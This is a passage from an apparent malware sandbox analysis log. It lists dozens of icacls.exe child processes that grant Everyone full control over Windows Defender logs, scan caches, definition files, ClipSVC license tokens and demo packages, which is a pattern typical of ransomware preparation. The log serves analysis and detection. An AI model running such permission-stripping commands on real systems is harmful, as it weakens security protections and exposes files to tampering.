  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-10282020-181632.log /grant Everyone:F /T /C /Q
  2⤵
  PID:17308
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-10282020-181632.log /grant Everyone:F /T /C /Q
  2⤵
  PID:6884
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-10282020-181632-00000003-ffffffff.bin /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:9056
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-3079DA66429056320DED3D5E871998ECC0E04BFB.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:6732
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-3079DA66429056320DED3D5E871998ECC0E04BFB.bin.80 /grant Everyone:F /T /C /Q
  2⤵
  PID:9856
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-3079DA66429056320DED3D5E871998ECC0E04BFB.bin.83 /grant Everyone:F /T /C /Q
  2⤵
  PID:8216
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-3079DA66429056320DED3D5E871998ECC0E04BFB.bin.A0 /grant Everyone:F /T /C /Q
  2⤵
  PID:9204
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\MpDiag.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:7884
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\22\109003 /grant Everyone:F /T /C /Q
  2⤵
  PID:7928
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\21\260 /grant Everyone:F /T /C /Q
  2⤵
  PID:5296
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\328 /grant Everyone:F /T /C /Q
  2⤵
  PID:9356
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\272 /grant Everyone:F /T /C /Q
  2⤵
  PID:7336
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107001 /grant Everyone:F /T /C /Q
  2⤵
  PID:9364
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\109002 /grant Everyone:F /T /C /Q
  2⤵
  PID:14572
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107002 /grant Everyone:F /T /C /Q
  2⤵
  PID:9768
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\109001 /grant Everyone:F /T /C /Q
  2⤵
  PID:13976
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\193 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:7404
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\15\262 /grant Everyone:F /T /C /Q
  2⤵
  PID:13596
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\11\200 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:14608
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\05\191 /grant Everyone:F /T /C /Q
  2⤵
  PID:9072
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\198 /grant Everyone:F /T /C /Q
  2⤵
  PID:13600
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\00\192 /grant Everyone:F /T /C /Q
  2⤵
  PID:13488
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\0E932F02-0000-0000-0000-500600000000-0.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:7672
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\01\271 /grant Everyone:F /T /C /Q
  2⤵
  PID:8144
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Network Inspection System\Support\NisLog.txt /grant Everyone:F /T /C /Q
  2⤵
  PID:7036
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsBase.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:9124
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsDlta.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:7052
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvBase.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:7060
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvDlta.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:6800
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisBase.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:12040
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisFull.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:13572
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppxProvisioning.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9180
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\wfp\wfpdiag.etl /grant Everyone:F /T /C /Q
  2⤵
  PID:14000
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java Development Kit\Reference Documentation.url /grant Everyone:F /T /C /Q
  2⤵
  PID:16340
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Get Help.url /grant Everyone:F /T /C /Q
  2⤵
  PID:9348
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.url /grant Everyone:F /T /C /Q
  2⤵
  PID:12900
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:9128
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9536
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoProvisioning.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:6080
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoProvisioning.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:7624
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:9740
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8024
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoHub.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:9788
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoHub.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:5784
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:6168
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9288
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.BasicAttractLoop.appx /grant Everyone:F /T /C /Q
  2⤵
  PID:8004
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.BasicAttractLoop.appx /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6616
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Microsoft\Content\Neutral\AppList\AppList.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5576
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoMode.bat /grant Everyone:F /T /C /Q
  2⤵
  PID:16372
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Microsoft\Content\Neutral\AppList\AppList.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9516
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoModeJapanese.bat /grant Everyone:F /T /C /Q
  2⤵
  PID:9428
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\LfSvc\Geofence\GeofenceApplicationID.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:13392
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:13440
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:12872
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataCache\dmrc.idx /grant Everyone:F /T /C /Q
  2⤵
  PID:9236
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\tokens.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:5732
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\02305155-8ac1-1189-ff55-b7119a53887c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7960
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\03f8974b-362e-33e3-2e0b-c7bc2ea01c63.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:8348
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0890ad2f-b74f-c384-f684-9c33f8f67924.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:8356
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\09ec127d-8158-a906-c12f-44a86e3e994f.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10216
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0a8c1492-65ca-6a01-de25-0e183559d10d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6184
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\135b8585-669d-61bf-dfb4-e6db0d77665d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7400
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\13ba8772-845b-29a1-ae9e-fb2793ccf4ea.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:7164
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\198ac17f-9072-e378-c878-c6ceedffa1a2.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7936
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1dae14df-4c42-28af-691e-10cc07a990b4.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8052
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1e225998-faa0-5fd4-4db7-5e7686ee3b47.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7440
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\215f9712-9fca-a3f8-5b11-660eefc73b96.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6820
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2657f7c0-8294-58c3-f394-15fe18ba174a.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5692
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\26943e1f-42ed-f190-2895-3bc2b8c4176d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7828
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28502d06-9d29-8514-1e5d-64447116d798.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7808
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28748306-9f02-a5d7-6ded-4459fddadc31.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4368
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2a3adcd0-4ddc-f3d2-6bcb-f11f9cbc1e2c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9492
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\391e9bee-1102-f683-107b-a19524dda8b7.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14948
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3c8c7eb3-7a1d-7981-0472-571cdd1d1292.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6348
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3ebdb897-991b-934f-ee13-2ca21ed81938.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9896
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3ebdb897-991b-934f-ee13-2ca21ed81938.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16452
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3f586f55-284b-e455-06b2-84c84e8d0d2d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8032
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\4c4ecbc0-0ec0-3929-aebb-a931a339fb23.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5604
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\517cfcaf-138b-1796-2cea-62892204250a.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5860
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\5b0a39aa-16e0-a938-f694-656664c7be15.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14392
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\600364a7-e11c-efda-2c12-eac40e75f19a.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8132
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\61b5bd89-4cb0-db77-6622-cb63b5a58080.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9804
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\630a70e7-1832-4f42-e2a2-5d35fdddc45f.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11984
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\67447b0c-05cf-6740-5f7b-391ab440c42d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5636
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\6e90ed81-9187-fa62-ce90-f18d7bed6b12.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14448
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71c8f37a-a7b9-aff0-6de0-9b276c089ad6.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8168
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71ef3df1-f4b1-69cd-793a-48e165e282aa.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11100
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7309084a-bb6f-20c3-ea54-aa108ceab1ae.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5420
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7646fa0f-b52c-71a8-3aed-950dd1668c09.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8372
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8292682a-6850-c06c-9b6d-9646f16d4ed0.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8460
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\865e8f30-20a1-9528-bb48-42999b5b2aa8.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:9728
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8ce3d3dd-a4c7-6c38-5fde-1f9f5df98807.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16488
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8d56e57b-8663-136d-ff69-a004e217825a.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12172
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8e383e90-b2f9-7bf2-1d5b-4e47dcb2014e.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16432
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\9d3ad23c-c6b8-7fb5-e4ab-f5d0a66dcfbc.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15276
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a1e5b165-0532-a6a3-f542-0c5c162be3e1.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6676
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a7e08b8b-ad4b-af00-ebcc-1aa29a833ce9.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14508
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ac116a72-b6b1-d558-23f6-10796e634d41.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15676
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b34b197c-c0ed-bf12-c9bb-44e883c66a9d.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:11588
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b81d7e70-84e7-b16a-e3d0-1e7aa2f1232d.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15484
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbc7a1c3-44c6-27b6-1e16-487a47263f3e.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6656
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbfbe8ad-1a35-a7f3-33bc-40912bf89dfb.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8544
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bcda97bb-bfd0-2a72-3c90-c8518f3d09ee.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15180
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c3d42a1a-2f3f-a4a9-6a04-cc1b234485fb.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15560
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c94a6c18-d496-da1c-8a02-fc6976e0145e.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15600
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ca947da2-7e9a-7249-8095-bceb379c6f74.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4688
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\cb692946-a9f3-639d-1064-a6d75a01b9c3.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13080
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d1ecfce2-f845-c1e9-052b-d2f457c135e6.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11016
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d508ba05-d8aa-2836-484d-3833d22fe185.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:11080
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d90ad1eb-bec3-18c1-8c97-eef683ba6a1f.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13300
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e2a686b1-b02a-b3e7-90cb-3fa0d708ce04.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9324
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d90ad1eb-bec3-18c1-8c97-eef683ba6a1f.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11592
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e335baf1-18ab-73fe-e089-3fa0a6e71a35.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8036
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e335baf1-18ab-73fe-e089-3fa0a6e71a35.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15204
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e64ffef1-e246-b632-595b-56076a3fa776.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:13308
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8fff2df-6041-8f21-3df7-db31661aa09b.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8708
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ecbc2601-0a67-4963-e594-43c65d6ec9a5.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5760
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8ac9388-7c9c-19cc-fd4d-cb72bb1544ea.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16520
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\eee47229-947d-2ac7-e8a3-49bafee251d1.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15628
- C:\Windows\SYSTEM32\icacls.exe
